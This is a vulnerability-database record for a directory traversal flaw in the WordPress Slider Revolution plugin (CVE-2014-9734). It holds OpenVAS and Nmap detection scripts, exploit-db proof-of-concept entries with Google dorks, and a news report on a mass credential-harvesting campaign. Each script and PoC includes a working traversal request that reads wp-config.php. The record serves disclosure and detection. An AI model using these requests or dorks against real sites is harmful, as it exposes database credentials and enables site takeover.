ID CVE-2014-9734 Type cve Reporter cve@mitre.org Modified 2015-07-01T15:12:00
Description
Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php.
{"openvas": [{"lastseen": "2020-05-12T17:23:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9734"], "description": "This host is installed with wordpress slider\n revolution plugin and is prone to arbitrary file download vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-07-10T00:00:00", "id": "OPENVAS:1361412562310805670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805670", "type": "openvas", "title": "WordPress Revslider Arbitrary File Download Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Revslider Arbitrary File Download Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805670\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2014-9734\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-10 15:54:40 +0530 (Fri, 10 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"WordPress Revslider Arbitrary File Download Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with wordpress slider\n revolution plugin and is prone to arbitrary file download vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to download an arbitrary file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper input\n sanitization of the img parameter in a revslider_show_image action to\n 'wp-admin/admin-ajax.php' script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to arbitrary files and to compromise\n the application.\");\n\n script_tag(name:\"affected\", value:\"WordPress Slider Revolution (revslider)\n plugin before 4.2.\");\n\n script_tag(name:\"solution\", value:\"Update to WordPress Slider Revolution 4.2 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/132366/\");\n script_xref(name:\"URL\", value:\"http://marketblog.envato.com/news/plugin-vulnerability/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://revolution.themepunch.com/\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"(DB_USER|DB_PASSWORD|DB_NAME)\"))\n{\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:24:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "description": "The host is installed with WordPress\n Slider Revolution plugin and is prone to arbitrary file download\n vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310805518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805518", "type": "openvas", "title": "WordPress Slider Revolution Arbitrary File Download Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Slider Revolution Arbitrary File Download Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805518\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 12:15:41 +0530 (Tue, 31 Mar 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_cve_id(\"CVE-2015-1579\", \"CVE-2014-9734\");\n script_name(\"WordPress Slider Revolution Arbitrary File Download Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with WordPress\n Slider Revolution plugin and is prone to arbitrary file download\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST\n request and check whether it is is able to download file or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to the plugin failed to\n restrict access to certain files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n unauthenticated remote attacker to download any arbitrary file.\");\n\n script_tag(name:\"affected\", value:\"WordPress Slider Revolution version\n 4.1.4 and prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/36554\");\n script_xref(name:\"URL\", value:\"http://www.homelab.it/index.php/2014/07/28/wordpress-slider-revolution-arbitrary-file-download\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nfunction construct_get_req(url, host, useragent)\n{\n wpReq = 'GET ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept-Encoding: gzip, deflate\\r\\n' +\n 'Connection: keep-alive\\r\\n\\r\\n';\n return wpReq;\n}\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-admin/admin-ajax.php?action=revslider_show_image' +\n '&img=../wp-config.php';\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:http_port);\n\nwpReq = construct_get_req(url:url, host:host, useragent:useragent);\n\nwpRes = http_keepalive_send_recv(port:http_port, data:wpReq);\n\nif(wpRes && wpRes =~ \"^HTTP/1\\.[01] 301\")\n{\n url1 = egrep( pattern:\"Location: http://.*wp-config.php\", string:wpRes);\n hostname = split(url1, sep:\"/\", keep:FALSE);\n if(!hostname[2]){\n exit(0);\n }\n\n wpReq = construct_get_req(url:url, host:hostname[2], useragent:useragent);\n wpRes = http_keepalive_send_recv(port:http_port, data:wpReq);\n}\n\nif(wpRes && \"SECURE_AUTH_KEY\" >< wpRes && \"<?php\" >< wpRes &&\n \"DB_NAME\" >< wpRes && \"DB_USER\" >< wpRes && \"DB_PASSWORD\" >< wpRes)\n{\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port,data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T23:23:37", "description": "Mulitple WordPress Themes (admin-ajax.php img param) - Arbitrary File Download. CVE-2015-1579. Webapps exploit for php platform", "published": "2014-09-01T00:00:00", "type": "exploitdb", "title": "Mulitple WordPress Themes admin-ajax.php img param - Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "modified": "2014-09-01T00:00:00", "id": "EDB-ID:34511", "href": "https://www.exploit-db.com/exploits/34511/", "sourceData": "# WordPress CuckooTap Theme & eShop Arbitrary File Download\r\n# Risk: High\r\n# CWE number: CWE-200\r\n# Author: Hugo Santiago\r\n# Contact: hugo.s@linuxmail.org\r\n# Date: 31/08/2014\r\n# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405\r\n# Tested on: Windows 7 and Gnu/Linux\r\n# Google Dork: \"Index of\" +/wp-content/themes/cuckootap/\r\n\r\n# WordPress IncredibleWP Theme Arbitrary File Download\r\n# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/\r\n# Google Dork: \"Index of\" +/wp-content/themes/IncredibleWP/\r\n\r\n# WordPress Ultimatum Theme Arbitrary File Download\r\n# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s\r\n# Google Dork: \"Index of\" +/wp-content/themes/ultimatum\r\n\r\n# WordPress Medicate Theme Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916\r\n# Google Dork: \"Index of\" +/wp-content/themes/medicate/\r\n\r\n# WordPress Centum Theme Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603\r\n# Google Dork: \"Index of\" +/wp-content/themes/Centum/\r\n\r\n# WordPress Avada Theme Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226\r\n# Google Dork: \"Index of\" +/wp-content/themes/Avada/\r\n\r\n# WordPress Striking Theme & E-Commerce Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763\r\n# Google Dork: \"Index of\" +/wp-content/themes/striking_r/\r\n\r\n# WordPress Beach Apollo Arbitrary File Download\r\n# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/\r\n# Google Dork: \"Index of\" +/wp-content/themes/beach_apollo/\r\n\r\n\r\nPoC:\r\n\r\nhttp://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/34511/"}, {"lastseen": "2016-02-04T03:47:07", "description": "Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability. CVE-2014-9734,CVE-2015-1579. Webapps exploit for php platform", "published": "2015-03-30T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "modified": "2015-03-30T00:00:00", "id": "EDB-ID:36554", "href": "https://www.exploit-db.com/exploits/36554/", "sourceData": "# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability\r\n\r\n# Exploit Author : Claudio Viviani\r\n\r\n# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380\r\n\r\n# Software Link : Premium plugin\r\n\r\n# Dork Google: revslider.php \"index of\"\r\n \r\n\r\n# Date : 2014-07-24\r\n\r\n# Tested on : Windows 7 / Mozilla Firefox\r\n Linux / Mozilla Firefox\r\n\r\n\r\n######################\r\n\r\n# Description\r\n\r\nWordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability\r\n\r\n\r\n######################\r\n\r\n# PoC\r\n\r\nhttp://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\n\r\n#####################\r\n\r\nDiscovered By : Claudio Viviani\r\n\r\n http://www.homelab.it\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\r\n#####################", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36554/"}], "packetstorm": [{"lastseen": "2017-04-11T03:24:16", "description": "", "published": "2017-04-07T00:00:00", "type": "packetstorm", "title": "WordPress Elegant Themes Divi Theme Directory Traversal Nmap NSE Script", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "modified": "2017-04-07T00:00:00", "id": "PACKETSTORM:142064", "href": "https://packetstormsecurity.com/files/142064/WordPress-Elegant-Themes-Divi-Theme-Directory-Traversal-Nmap-NSE-Script.html", "sourceData": "`local http = require \"http\" \nlocal shortport = require \"shortport\" \nlocal stdnse = require \"stdnse\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \n \ndescription = [[ \nDirectory traversal vulnerability in the Elegant Themes Divi theme for WordPress \nallows remote attackers to read arbitrary files \nvia a .. (dot dot) in the img parameter \nin a revslider_show_image action to wp-admin/admin-ajax.php. \n \nNOTE: this vulnerability may be a duplicate of CVE-2014-9734. \n \nWordpress Slider Revolution Responsive <= 4.1.4 \nsuffers from Arbitrary File Download vulnerability. \n]] \n \n--- \n-- @usage \n-- nmap --script http-vuln-cve2015-1579 \n-- \n-- @args \n-- http-vuln-cve2015-1579.uri \n-- Wordpress root directory on the website. Default: '/' \n-- \n-- @output \n-- PORT STATE SERVICE \n-- 80/tcp open http \n-- | http-vuln-cve2015-1579 \n-- | VULNERABLE: \n-- | WordPress Plugin Slider REvolution 4.1.4 \n-- | Arbitrary File Download vulnerability \n-- | State: VULNERABLE (Exploitable for versions <= 4.1.4) \n-- | IDs: \n-- | CVE: CVE-2015-1579 \n-- | CVE: CVE-2014-9734 \n-- | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress \n-- | allows remote attackers to read arbitrary files \n-- | via a .. (dot dot) in the img parameter \n-- | in a revslider_show_image action to wp-admin/admin-ajax.php. \n-- | \n-- | NOTE: this vulnerability may be a duplicate of CVE-2014-9734. \n-- | \n-- | References: \n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579 \n-- \n--- \n \nauthor = \"Rewanth Cool\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"vuln\", \"intrusive\", \"exploit\"} \n \nportrule = shortport.port_or_service( {80, 443}, {\"http\", \"https\"}, \"tcp\", \"open\") \n \naction = function(host, port) \nlocal uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\" \n \nlocal vulnPath = \"wp-admin/admin-ajax.php\" \nlocal vulnParams = \"action=revslider_show_image&img=../wp-config.php\" \n \n-- Exploiting the vulnerability \nlocal response = http.get( host, port, uri..vulnPath..\"?\"..vulnParams ) \n \nif response.status == 200 then \nlocal vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal vuln = { \ntitle = \"WordPress Plugin Slider REvolution 4.1.4\", \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nDirectory traversal vulnerability in the Elegant Themes Divi theme for WordPress \nallows remote attackers to read arbitrary files \nvia a .. (dot dot) in the img parameter \nin a revslider_show_image action to wp-admin/admin-ajax.php. \n \nNOTE: this vulnerability may be a duplicate of CVE-2014-9734. \n]], \nIDS = { \nCVE = { \n\"CVE-2014-9734\", \n\"CVE-2015-1579\" \n}, \nreferences = { \n\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579\" \n}, \ndates = { \ndisclosure = { \nyear = \"2015\", \nmonth = \"02\", \nday = \"11\" \n}, \n} \n} \n} \n \n-- Matching the patern in the response \nif( string.match(response.body, ((\"<?php\"):gsub(\"%p\",\"%%%0\"))) ) then \nvuln.state = vulns.STATE.EXPLOIT \nvuln.exploit_results = response.body \nreturn vulnReport:make_output(vuln) \nend \nend \nend \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142064/http-vuln-cve2015-1579.nse"}], "threatpost": [{"lastseen": "2020-09-11T21:53:12", "bulletinFamily": "info", "cvelist": ["CVE-2014-9734", "CVE-2015-5468", "CVE-2015-9406", "CVE-2019-9618"], "description": "Attackers were spotted targeting over one million WordPress websites in a campaign over the weekend. The campaign unsuccessfully attempted to exploit old cross-site scripting (XSS) vulnerabilities in WordPress plugins and themes, with the goal of harvesting database credentials.\n\nThe attacks were aiming to download [wp-config.php](<https://wordpress.org/support/article/editing-wp-config-php/>), a file critical to all WordPress installations. The file is located in the root of WordPress file directories and contains websites\u2019 database credentials and connection information, in addition to authentication unique keys and salts. By downloading the sites\u2019 configuration files, an attacker would gain access to the site\u2019s database, where site content and credentials are stored, said researchers with Wordfence who spotted the attack.\n\nBetween May 29 and May 31, researchers observed (and were able to block) over 130 million attacks targeting 1.3 million sites.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe peak of this attack campaign occurred on May 30, 2020,\u201d said Wordfence researchers [on Wednesday](<https://www.wordfence.com/blog/2020/06/large-scale-attack-campaign-targets-database-credentials/?utm_campaign=Wordfence%20Blog%20Emails&utm_medium=email&_hsmi=88917054&_hsenc=p2ANqtz-9VC4zU8rraluI1oOhXYuKduVFHJCD2zVc0DDeiYc4rMQ-9fPVyP5IHfIzCv1-wK9zBTWwZz4XtYdEXgCv7_OgjBcfPoLFrOmxoNYg9wuyeWYPhUBc&utm_content=88917054&utm_source=hs_email>). \u201cAt this point, attacks from this campaign accounted for 75 percent of all attempted exploits of plugin and theme vulnerabilities across the WordPress ecosystem.\u201d\n\nResearchers linked the threat actor in this incident to an attack earlier in May [previously targeting XSS](<https://www.wordfence.com/blog/2020/05/nearly-a-million-wp-sites-targeted-in-large-scale-attacks/>) vulnerabilities. These previous campaigns, which began on April 28, attempted to inject a malicious JavaScript into websites, that would then redirect visitors and take advantage of an administrator\u2019s session to insert a backdoor into the theme\u2019s header.\n\n\u201cAfter further investigation, we found that this threat actor was also attacking other vulnerabilities, primarily older vulnerabilities allowing them to change a site\u2019s home URL to the same domain used in the XSS payload in order to redirect visitors to malvertising sites,\u201d researchers said at the time.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/03155848/config-grab-attack-spike-2048x809-1.png>)\n\nThat campaign sent attacks from over 20,000 different IP addresses, said researchers. This most recent campaign is using the same IP addresses, which accounted for the majority of the attacks and sites targeted, leading researchers to link the two campaigns.\n\nThe more recent campaign has also expanded in its targeting, researchers said, now reaching nearly a million new sites that weren\u2019t included in the previous XSS campaign. As with the XSS campaigns, almost all of the attacks are targeted at older vulnerabilities in outdated plugins or themes that allow files to be downloaded or exported.\n\nWhile hundreds of exploits are being attempted, researchers told Threatpost that among the CVEs being most frequently used are [CVE-2014-9734](<https://nvd.nist.gov/vuln/detail/CVE-2014-9734>), [CVE-2015-9406](<https://nvd.nist.gov/vuln/detail/CVE-2015-9406>), [CVE-2015-5468](<https://nvd.nist.gov/vuln/detail/CVE-2015-5468>) and CVE-2019-9618. The attacker appears to be systematically scraping exploit-db.com and other sources for potential exploits \u2013 and then running them against a list of sites, researchers told Threatpost.\n\n\u201cMost of them are in themes or plugins designed to allow file downloads by reading the content of a file provided in a query string and then serving it up as a downloadable attachment,\u201d said Ram Gall, with Wordfence.\n\nResearchers said websites that may have been compromised must change their database password and authentication unique keys and salts immediately.\n\n\u201cIf your server is configured to allow remote database access, an attacker with your database credentials could easily add an administrative user, exfiltrate sensitive data, or delete your site altogether. Even if your site does not allow remote database access, an attacker who knows your site\u2019s authentication keys and salts may be able to use them to more easily bypass other security mechanisms.\u201d\n\nResearchers also urged users to ensure that their plugins are updated, as vulnerabilities in WordPress plugins and themes continue to be an issue. A few weeks ago, for instance, researchers disclosed two flaws in [Page Builder by SiteOrigin, a WordPress plugin](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) with a million active installs that\u2019s used to build websites via a drag-and-drop function. Both security bugs can lead to cross-site request forgery (CSRF) and XSS.\n\nIn this recent campaign, many of the flaws had patches available \u2013 but users had not updated, leaving their websites vulnerable: \u201cNonetheless, we urge you to make sure that all plugins and themes are kept up to date, and to share this information with any other site owners or administrators you know,\u201dsaid researchers. \u201cAttacks by this threat actor are evolving and we will continue to share additional information as it becomes available.\u201d\n", "modified": "2020-06-03T20:37:44", "published": "2020-06-03T20:37:44", "id": "THREATPOST:CD191CB2754EB09D32488CA26DCC19F8", "href": "https://threatpost.com/attackers-target-1m-wordpress-sites-to-harvest-database-credentials/156255/", "type": "threatpost", "title": "Attackers Target 1M+ WordPress Sites To Harvest Database Credentials", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
